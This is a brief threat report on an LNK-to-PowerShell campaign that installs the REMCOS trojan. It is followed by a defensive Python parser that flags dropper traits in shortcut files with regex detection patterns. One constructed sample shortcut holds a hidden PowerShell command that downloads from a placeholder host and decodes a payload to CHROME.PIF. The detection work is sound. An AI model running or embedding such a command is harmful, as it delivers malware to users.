A multi-stage malware campaign involves malicious Windows Shortcut files that secretly deploy the REMCOS remote-access trojan. This sophisticated attack encrypts its payloads and grants attackers extensive control over infected systems, including keystroke logging, file access, and spying through webcams and microphones. #REMCOS #LAT61
Key points
- The attack uses malicious LNK files to initiate the malware infection.
- PowerShell commands hidden within the LNK files download and decode encrypted payloads.
- The malware disguises the final payload as a legitimate-looking PIF file named "CHROME.PIF".
- Upon installation, REMCOS provides remote attackers with extensive control over the infected system.
- The C2 infrastructure is hosted in Romania and the US, emphasizing the global nature of the threat.
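As an added defender-side example, not code from the hackread article or from the campaign itself, the following minimal parser reads the Windows shortcut (MS-SHLLINK) format, extracts the command line a .LNK runs, and flags the traits the key points describe: a shortcut that launches PowerShell with a hidden window, downloads and decodes a payload, and drops a .PIF. The two sample shortcuts, the placeholder host c2.example.invalid and the regex heuristics are constructed assumptions for illustration.

```python
"""Triage a Windows .LNK: extract its command line and flag LNK-to-PowerShell dropper traits."""
import re, struct, uuid
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80    # LinkFlags, MS-SHLLINK 2.1.1
STRING_DATA = ((0x04, "name"), (0x08, "relpath"), (0x10, "workdir"), (0x20, "args"), (0x40, "icon"))
SUSPICIOUS = (  # (regex over the lower-cased command line, reason); heuristics are assumptions
    (r"powershell|pwsh", "shortcut launches PowerShell"),
    (r"\s-w(indowstyle)?\s+hidden", "hides the console window"),
    (r"\s-e(c|nc|ncodedcommand)?\s", "uses an encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "downloads a payload"),
    (r"frombase64string|\[convert\]|-bxor", "decodes/decrypts a payload"),
    (r"\.pif\b", "writes or runs a .PIF executable"),
)

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields; IDList and LinkInfo are skipped when present."""
    if len(data) < 0x4C or data[:4] != struct.pack("<I", 0x4C) or data[4:20] != LNK_CLSID.bytes_le:
        raise ValueError("not a shell link: bad HeaderSize or CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                     # fixed 76-byte ShellLinkHeader
    if flags & HAS_ID_LIST:                        # IDListSize (2 bytes) excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields, unicode = {}, bool(flags & IS_UNICODE)
    for bit, name in STRING_DATA:                  # CountCharacters, then the chars, no NUL
        if flags & bit:
            n, pos = struct.unpack_from("<H", data, pos)[0], pos + 2
            size = 2 * n if unicode else n         # cp1252 assumed for the non-Unicode case
            fields[name] = data[pos:pos + size].decode("utf-16-le" if unicode else "cp1252")
            pos += size
    return fields

def triage_lnk(data: bytes) -> list[str]:
    """Reasons the shortcut looks like a dropper; an empty list means nothing matched."""
    f = parse_lnk(data)
    cmd = (f.get("relpath", "") + " " + f.get("args", "")).lower()
    return [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]

def build_lnk(relpath: str, args: str) -> bytes:
    """Constructed sample: minimal Unicode shortcut carrying only RELATIVE_PATH and ARGUMENTS."""
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack(
        "<IIQQQIIIHHII", 0x08 | 0x20 | IS_UNICODE, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relpath, args))

# Constructed samples; the host is a placeholder, not an indicator from the campaign
MALICIOUS_LNK = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "-w hidden -nop -c "
    "\"$s=(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p');[Convert]::FromBase64String($s)>CHROME.PIF\"")
BENIGN_LNK = build_lnk(r"..\..\Program Files\Google\Chrome\Application\chrome.exe", "--profile-directory=Default")
```

Run `triage_lnk` over shortcuts harvested from mail attachments or download folders; the benign Chrome sample returns no findings, the constructed dropper sample returns five.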
Read More: https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/